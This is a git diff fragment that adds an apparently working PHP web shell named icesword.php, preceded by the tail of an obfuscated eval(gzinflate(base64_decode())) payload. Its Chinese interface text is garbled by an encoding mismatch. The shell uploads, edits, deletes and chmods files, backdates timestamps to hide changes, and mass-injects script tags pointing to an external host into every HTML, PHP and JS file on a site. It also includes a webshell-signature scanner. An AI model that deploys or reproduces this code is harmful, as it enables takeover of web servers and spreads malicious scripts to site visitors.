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"; +eval(gzinflate(base64_decode($code))); +?>div> + diff --git a/php/icesword.php b/php/icesword.php new file mode 100644 index 0000000..e5bfad5 --- /dev/null +++ b/php/icesword.php @@ -0,0 +1,2720 @@ + +*{padding:0; margin:0;} +body{background:threedface;font-family:"Verdana","Tahoma","",sans-serif;font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;} +a{color:#000000;text-decoration:none;} +a:hover{background:#BBBBBB;} +table{color:#000000;font-family:"Verdana","Tahoma","",sans-serif;font-size:13px;border:1px solid #999999;} +td{background:#F9F6F4;} +.toptd{background:threedface;width:310px;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;} +.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;} +.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;} +\n +END; +return false; +} +//ļ +class packdir +{ + var $out=''; + var $datasec=array(); + var $ctrl_dir=array(); + var $eof_ctrl_dir="\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset=0; +function packdir($array) +{ + if(@function_exists('gzcompress')) + { + for($n = 0;$n < count($array);$n++) + { + $array[$n] = urldecode($array[$n]); + $fp = @fopen($array[$n], 'r'); + $filecode = @fread($fp, @filesize($array[$n])); + @fclose($fp); + $this -> filezip($filecode,basename($array[$n])); + } + @closedir($zhizhen); + $this->out = $this->packfile(); + return true; +} +return false; +} +function at($atunix = 0) +{ + $unixarr = ($atunix == 0) ? getdate() : getdate($atunix); + if ($unixarr['year'] < 1980) + { + $unixarr['year'] = 1980; + $unixarr['mon'] = 1; + $unixarr['mday'] = 1; + $unixarr['hours'] = 0; + $unixarr['minutes'] = 0; + $unixarr['seconds'] = 0; + } + return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1); +} +function filezip($data, $name, $time = 0) +{ + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->at($time)); + $hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $c_len = strlen($zdata); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $this -> datasec[] = $fr; + $new_offset = strlen(implode('', $this->datasec)); + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset = $new_offset; + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; +} +function packfile() +{ + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00"; +} +} +function File_Str($string) +{ + return str_replace('//','/',str_replace('\\','/',$string)); +} +function File_Size($size) +{ + if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G'; + elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M'; + elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K'; + else $size = $size . ' B'; + return $size; +} +function File_Mode() +{ + $RealPath = realpath('./'); + $SelfPath = $_SERVER['PHP_SELF']; + $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); + return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); +} +function File_Read($filename) +{ + $handle = @fopen($filename,"rb"); + $filecode = @fread($handle,@filesize($filename)); + @fclose($handle); + return $filecode; +} +function File_Write($filename,$filecode,$filemode) +{ + $key = true; + $handle = @fopen($filename,$filemode); + if(!@fwrite($handle,$filecode)) + { + @chmod($filename,0666); + $key = @fwrite($handle,$filecode) ? true : false; + } +@fclose($handle); +return $key; +} +function File_Up($filea,$fileb) +{ + $key = @copy($filea,$fileb) ? true : false; + if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false; + return $key; +} +function File_Down($filename) +{ + if(!file_exists($filename)) return false; + $filedown = basename($filename); + $array = explode('.', $filedown); + $arrayend = array_pop($array); + header('Content-type: application/x-'.$arrayend); + header('Content-Disposition: attachment; filename='.$filedown); + header('Content-Length: '.filesize($filename)); + @readfile($filename); + exit; +} +function File_Deltree($deldir) +{ + if(($mydir = @opendir($deldir)) == NULL) return false; + while(false !== ($file = @readdir($mydir))) + { + $name = File_Str($deldir.'/'.$file); + if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);} + if(is_file($name)){@chmod($name,0777);@unlink($name);} + } + @closedir($mydir); + @chmod($deldir,0777); + return @rmdir($deldir) ? true : false; +} +function File_Act($array,$actall,$inver) +{ + if(($count = count($array)) == 0) return 'ѡļ'; + if($actall == 'e') + { + $zip = new packdir; + if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;} + return 'ļʧ'; + } + $i = 0; + while($i < $count) + { + $array[$i] = urldecode($array[$i]); + switch($actall) + { + case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = 'Ƶ'.$inver.'Ŀ¼'; break; + case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ'; break; + case "c" : if(!eregi("^[0-7]{4}$",$inver)) return 'ֵ'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '޸Ϊ'.$inver; break; + case "d" : @touch($array[$i],strtotime($inver)); $msg = '޸ʱΪ'.$inver; break; + } + $i++; + } + return 'ѡļ'.$msg.''; +} +function File_Edit($filepath,$filename,$dim = '') +{ + $THIS_DIR = urlencode($filepath); + $THIS_FILE = File_Str($filepath.'/'.$filename); + if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));} + else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';} +print<< +var NS4 = (document.layers); +var IE4 = (document.all); +var win = this; +var n = 0; +function search(str){ + var txt, i, found; + if(str == "")return false; + if(NS4){ + if(!win.find(str)) while(win.find(str, false, true)) n++; else n++; + if(n == 0) alert(str + " ... Not-Find") + } + if(IE4){ + txt = win.document.body.createTextRange(); + for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){ + txt.moveStart("character", 1); + txt.moveEnd("textedit") + } + if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++} + else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")} + } + return false +} +function CheckDate(){ + var re = document.getElementById('mtime').value; + var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; + var r = re.match(reg); + if(r==null){alert('ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss');return false;} + else{document.getElementById('editor').submit();} +} + +
          : +
          +
          +
          +
          +
          ļ޸ʱ
          +
          +
          +
          +END; +} +function File_Soup($p) +{ + $THIS_DIR = urlencode($p); + $UP_SIZE = get_cfg_var('upload_max_filesize'); + $MSG_BOX = 'С:'.$UP_SIZE.', ʽ(new.php),Ϊ,򱣳ԭļ.'; + if(!empty($_POST['updir'])) + { + if(count($_FILES['soup']) >= 1) + { + $i = 0; + foreach ($_FILES['soup']['error'] as $key => $error) + { + if ($error == UPLOAD_ERR_OK) + { + $souptmp = $_FILES['soup']['tmp_name'][$key]; + if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key]; + $MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'ϴɹ' : $soupname.'ϴʧ'; + } + $i++; + } + } + else + { + $MSG_BOX = 'ѡļ'; + } + } +print<<{$MSG_BOX}
          +
          +
          ϴĿ¼:
          +
          1 $MSG[0]
          +
          2 $MSG[1]
          +
          3 $MSG[2]
          +
          4 $MSG[3]
          +
          5 $MSG[4]
          +
          6 $MSG[5]
          +
          7 $MSG[6]
          +
          8 $MSG[7]
          +
          +
          +END; +} +function File_a($p) +{ + if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; + $MSG_BOX = 'ȴϢ'; + $UP_DIR = urlencode(File_Str($p.'/..')); + $REAL_DIR = File_Str(realpath($p)); + $FILE_DIR = File_Str(dirname(__FILE__)); + $ROOT_DIR = File_Mode(); + $THIS_DIR = urlencode(File_Str($REAL_DIR)); + $NUM_D = 0; + $NUM_F = 0; + if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '༭ļ '.$_POST['pfn'].' ɹ' : '༭ļ '.$_POST['pfn'].' ʧ';@touch($_POST['pfn'],$intime);} + if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? 'ϴļ '.$upfilename.' ɹ' : 'ϴļ '.$upfilename.' ʧ';} + if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);} + if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = 'ֵ'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '޸ '.$modfile.' Ϊ '.$_GET['md'].' ɹ' : '޸ '.$modfile.' Ϊ '.$_GET['md'].' ʧ';} + if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? ' '.$_GET['mn'].' Ϊ '.$_GET['rn'].' ɹ' : ' '.$_GET['mn'].' Ϊ '.$_GET['rn'].' ʧ';} + if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? 'Ŀ¼ '.$_GET['dn'].' ɹ' : 'Ŀ¼ '.$_GET['dn'].' ʧ';} + if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? 'ɾĿ¼ '.$_GET['dd'].' ɹ' : 'ɾĿ¼ '.$_GET['dd'].' ʧ';} + if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = 'ļ';} + Root_CSS(); +print<< + function Inputok(msg,gourl) + { + smsg = "ǰļ:[" + msg + "]"; + re = prompt(smsg,unescape(msg)); + if(re) + { + var url = gourl + escape(re); + window.location = url; + } + } + function Delok(msg,gourl) + { + smsg = "ȷҪɾ[" + unescape(msg) + "]?"; + if(confirm(smsg)) + { + if(gourl == 'b') + { + document.getElementById('actall').value = escape(gourl); + document.getElementById('fileall').submit(); + } + else window.location = gourl; + } + } + function CheckDate(msg,gourl) + { + smsg = "ǰļʱ:[" + msg + "]"; + re = prompt(smsg,msg); + if(re) + { + var url = gourl + re; + var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; + var r = re.match(reg); + if(r==null){alert('ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss');return false;} + else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();} + } + } + function CheckAll(form) + { + for(var i=0;i +
          {$MSG_BOX}
          +
          +
          + +
          +
          +
          + + + + + + +
          +
          + + +END; + if(($h_d = @opendir($p)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' or $Filename == '..') continue; + $Filepath = File_Str($REAL_DIR.'/'.$Filename); + if(is_dir($Filepath)) + { + $Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4); + $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); + $Filepath = urlencode($Filepath); + echo "\r\n".' '; + $Filename = urlencode($Filename); + echo ' '; + echo ' '; + echo ' '; + echo ' '."\r\n"; + $NUM_D++; + } + } + @rewinddir($h_d); + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' or $Filename == '..') continue; + $Filepath = File_Str($REAL_DIR.'/'.$Filename); + if(!is_dir($Filepath)) + { + $Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath); + $Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4); + $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); + $Filesize = File_Size(@filesize($Filepath)); + if($Filepath == File_Str(__FILE__)) $fname = ''.$Filename.''; else $fname = $Filename; + echo "\r\n".' '; + $Filepath = urlencode($Filepath); + $Filename = urlencode($Filename); + echo ' '; + echo ' '; + echo ' '; + echo ' '."\r\n"; + $NUM_F++; + } + } + @closedir($h_d); + if(!$Filetime) $Filetime = '2009-01-01 00:00:00'; +print<< +
          + + + + + + + +Ŀ¼({$NUM_D}) / ļ({$NUM_F})
          + +END; + return true; +} +// +function Guama_Pass($length) +{ + $possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; + $str = ""; + while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1); + return $str; +} +function Guama_Make($codea,$codeb,$codec) +{ + return str_replace($codea,Guama_Pass($codeb),$codec); +} +function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb) +{ + if(($h_d = @opendir($gp)) == NULL) return false; + if($gm > 12) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + if($gl != ''){if(eregi($gl,$Filename)) continue;} + $Filepath = File_Str($gp.'/'.$Filename); + if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb); + if(eregi($gt,$Filename)) + { + $fc = File_Read($Filepath); + if(($gk != '') && (stristr($fc,chop($gk)))) continue; + if(($gf != '') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc; + if($gd) $ftime = @filemtime($Filepath); + if($gi == 'a'){if(!stristr($fc,'')) continue; $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fc); $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fcm);} + if($gi == 'b') $fcm = $gcm."\r\n".$fc; + if($gi == 'c') $fcm = $fc."\r\n".$gcm; + echo File_Write($Filepath,$fcm,'wb') ? 'ɹ:'.$Filepath.'
          '."\r\n" : 'ʧ:'.$Filepath.'
          '."\r\n"; + if($gd) @touch($Filepath,$ftime); + ob_flush(); + flush(); + } + } + @closedir($h_d); + return true; +} +function Guama_b() +{ + if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc']))) + { + echo '
          '; + $_POST['gt'] = str_replace('.','\\.',$_POST['gt']); + if($_POST['inout'] == 'a') $_POST['gl'] = str_replace('.','\\.',$_POST['gl']); else $_POST['gl'] = ''; + if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]')) + { + $temp = explode('[-',$_POST['gc']); + $gk = $temp[0]; + preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST['gc'],$nc); + if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo '쳣ֹ'; return false;} + $gm = (int)$nc[1][0]; + $gf = $nc[0][0]; + } + else + { + $gk = $_POST['gc']; + $gm = 0; + $gf = ''; + } + if(!isset($_POST['gx'])) $gk = ''; + $gd = isset($_POST['gd']) ? true : false; + $gb = ($_POST['gb'] == 'a') ? true : false; + echo Guama_Auto($_POST['gp'],$_POST['gt'],$_POST['gl'],$_POST['gc'],$gm,$gf,$_POST['gi'],$gk,$gd,$gb) ? '' : '쳣ֹ'; + echo '
          '; + return false; + } + $FILE_DIR = File_Str(dirname(__FILE__)); + $ROOT_DIR = File_Mode(); +print<< +function Fulll(i) +{ + if(i==0) return false; + Str = new Array(5); + if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];} + else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.cgi|.aspx";Str[5] = ".js";sform.gt.value = Str[i];} + return true; +} +function autorun() +{ + if(document.getElementById('gp').value == ''){alert('·Ϊ');return false;} + if(document.getElementById('gt').value == ''){alert('ͲΪ');return false;} + if(document.getElementById('gc').value == ''){alert('벻Ϊ');return false;} + document.getElementById('sform').submit(); +} + +
          +
          · +
          +
          ļ +
          +
          ˶ + ر
          +
          +
          ˵: ԶѰ[-6-]ǩ,滻Ϊַ,6ʾλַ,12λ,οԲ[-6-]ǩ. +
          ʾ: <script language=javascript src="http://blackbap.org/ad.js?EMTDSU"></script>
          +
          </head>ǩ֮ǰ +ļ ļĩβ
          +
          ܹظ ļ޸ʱ䲻
          +
          Ӧڸļ,ļкļ
          Ӧڸļ
          +
          + +END; +return true; +} +// +function Qingma_Auto($qp,$qt,$qc,$qd,$qb) +{ + if(($h_d = @opendir($qp)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + $Filepath = File_Str($qp.'/'.$Filename); + if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb); + if(eregi($qt,$Filename)) + { + $ic = File_Read($Filepath); + if(!stristr($ic,$qc)) continue; + $ic = str_replace($qc,'',$ic); + if($qd) $ftime = @filemtime($Filepath); + echo File_Write($Filepath,$ic,'wb') ? 'ɹ:'.$Filepath.'
          '."\r\n" : 'ʧ:'.$Filepath.'
          '."\r\n"; + if($qd) @touch($Filepath,$ftime); + ob_flush(); + flush(); + } + } + @closedir($h_d); + return true; +} +function Qingma_c() +{ + if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc']))) + { + echo '
          '; + $qt = str_replace('.','\\.',$_POST['qt']); + $qd = isset($_POST['qd']) ? true : false; + $qb = ($_POST['qb'] == 'a') ? true : false; + echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? '' : '쳣ֹ'; + echo '
          '; + return false; + } + $FILE_DIR = File_Str(dirname(__FILE__)); + $ROOT_DIR = File_Mode(); +print<< +function Fullll(i){ + if(i==0) return false; + Str = new Array(5); + if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];} + else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];} + return true; +} +function autoup(){ + if(document.getElementById('qp').value == ''){alert('·Ϊ');return false;} + if(document.getElementById('qt').value == ''){alert('ͲΪ');return false;} + if(document.getElementById('qc').value == ''){alert('벻Ϊ');return false;} + document.getElementById('xform').submit(); +} + +
          +
          · +
          +
          ļ +
          +
          +
          ļ޸ʱ䲻
          +
          Ӧڸļ,ļкļ +
          Ӧڸļ
          +
          + +END; + return true; +} +//滻 +function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb) +{ + if(($h_d = @opendir($tp)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + $Filepath = File_Str($tp.'/'.$Filename); + if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb); + $doing = false; + if(eregi($tt,$Filename)) + { + $ic = File_Read($Filepath); + if($th) + { + if(!stristr($ic,$tca)) continue; + $ic = str_replace($tca,$tcb,$ic); + $doing = true; + } + else + { + preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc); + for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}} + } + if($td) $ftime = @filemtime($Filepath); + if($doing) echo File_Write($Filepath,$ic,'wb') ? 'ɹ:'.$Filepath.'
          '."\r\n" : 'ʧ:'.$Filepath.'
          '."\r\n"; + if($td) @touch($Filepath,$ftime); + ob_flush(); + flush(); + } + } + @closedir($h_d); + return true; +} +function Tihuan_d() +{ + if((!empty($_POST['tp'])) && (!empty($_POST['tt']))) + { + echo '
          '; + $tt = str_replace('.','\\.',$_POST['tt']); + $td = isset($_POST['td']) ? true : false; + $tb = ($_POST['tb'] == 'a') ? true : false; + $th = ($_POST['th'] == 'a') ? true : false; + if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']); + echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '' : '쳣ֹ'; + echo '
          '; + return false; + } + $FILE_DIR = File_Str(dirname(__FILE__)); + $ROOT_DIR = File_Mode(); +print<< +function Fulllll(i){ + if(i==0) return false; + Str = new Array(5); + if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];} + else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];} + return true; +} +function showth(th){ + if(th == 'a') document.getElementById('setauto').innerHTML = ':
          滻Ϊ:'; + if(th == 'b') document.getElementById('setauto').innerHTML = '
          غ׺

          滻Ϊ '; + return true; +} +function autoup(){ + if(document.getElementById('tp').value == ''){alert('·Ϊ');return false;} + if(document.getElementById('tt').value == ''){alert('ͲΪ');return false;} + if(document.getElementById('tca').value == ''){alert('벻Ϊ');return false;} + document.getElementById('tform').submit(); +} + +
          +
          滻· +
          +
          ļ +
          +
          滻ļеָ 滻ļеصַ
          +

          滻Ϊ
          +
          ļ޸ʱ䲻
          +
          滻Ӧڸļ,ļкļ +
          滻Ӧڸļ
          +
          + +END; +return true; +} +//ɨľ +function Antivirus_Auto($sp,$features,$st,$sb) +{ + if(($h_d = @opendir($sp)) == NULL) return false; + $ROOT_DIR = File_Mode(); + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + $Filepath = File_Str($sp.'/'.$Filename); + if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st); + if(eregi($st,$Filename)) + { + if($Filepath == File_Str(__FILE__)) continue; + $ic = File_Read($Filepath); + foreach($features as $var => $key) + { + if(stristr($ic,$key)) + { + $Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath); + $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); + echo ' '.$Filepath.'
          ɾ '; + echo ' '.$Filetime.' '.$var.'

          '."\r\n"; + break; + } + } + ob_flush(); + flush(); + } + } + @closedir($h_d); + return true; +} + +function Antivirus_e() +{ + if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾɹ';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾɹ' : 'ɾʧ';} return false;} + if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } + $SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode(); + $features_php = array('evalһ仰'=>'eval(','read'=>'->read()','readdir3'=>'readdir(','MYSQLԶ庯'=>'returns string soname','1'=>'eval(gzinflate(','2'=>'eval(base64_decode(','3'=>'base64_decode(','evalһ仰2'=>'eval (','php'=>'copy($_FILES','2'=>'copy ($_FILES','ϴ'=>'move_uploaded_file($_FILES','ϴ2'=>'move_uploaded_file ($_FILES','С'=>'str_replace(\'\\\\\',\'/\','); + $features_asx = 